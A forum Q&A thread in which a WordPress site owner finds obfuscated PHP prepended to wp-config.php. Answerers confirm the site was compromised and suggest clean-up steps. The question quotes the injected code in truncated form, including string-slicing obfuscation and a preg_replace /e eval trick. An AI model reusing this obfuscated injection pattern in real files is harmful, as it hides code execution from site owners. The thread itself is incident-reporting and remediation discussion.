# Garbage in beginning of wp-config.php - was this WP installation compromised?

Tags: security, wp-config

I hadn't realized that one of my WP sites wasn't being accessed in the last months, and consequently not being updated, and today I have found that my `config.php` has some garbage in the beginning of the file:

```
<?php $uqnrguvics = 'x7825r% ... more garbage ... 
825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3/(.*)/epreg_replacezrxmuexghf'; 
$uvozcxjtxg = explode(chr((253-209)),'4137,25,2713,60,8524,67 ... more garbage ...
'); $tuyrkvuamr=substr($uqnrguvics,(49619-39513),(27-20)); 
if (!function_exists('zpjgeglbtt')) { function zpjgeglbtt($lwtbhpepkn, $lkvuvnwcsu) { 
$sblzyeefjv = NULL; for($mxodybdogx=0;$mxodybdogx<(sizeof($lwtbhpepkn)/2);$mxodybdogx++)
{ $sblzyeefjv .= substr($lkvuvnwcsu, $lwtbhpepkn[($mxodybdogx*2)],
$lwtbhpepkn[($mxodybdogx*2)+1]); }
return $sblzyeefjv; };} $rudmfyfhqb="\    x20\57... hex garbage ... \52\x2f\40";     
$vkyezvmvec=substr($uqnrguvics,(42452-32339),(65-53)); 
$vkyezvmvec($tuyrkvuamr, $rudmfyfhqb, NULL); $vkyezvmvec=$rudmfyfhqb; 
$vkyezvmvec=(811-690); $uqnrguvics=$vkyezvmvec-1; ?>
<?php 
HERE comes an usual wp-config.php, which as far as I remember is the one I had before
```

The file also has DOS encoding, although I'm running it on Linux.

(I have included line breaks).

Does this mean this installation has been compromised? Or is this something automatically included by WP somehow?

If it was, is it enough to just change the admin password? Logging in as admin doesn't show anything unusual.

Comment: This isn't part of WordPress - *never ever*. Your installation has indeed been compromised I guess. You should initiate all necessary steps to secure your installation. Change all your security relevant access data, for your server too. Make sure this isn't possible by a security hole in the code, e.g. plug-ins.

Comment: Thank you. I have checked all PHP files, changed WP's `MySQL` password, checked all WP users, and since apache runs as user `www-data`, I believe (hope) that there isn't much else to do.

Answer (score 4, accepted):

Yes, it appears so. In my experience the best thing to do is re-upload a fresh WordPress core to ensure that all traces have been squashed.

It happens... If you aren't already using security plugins I'd recommend Wordfence and BruteProtect to help keep brute force attacks out as well as checking your core WordPress files for changes.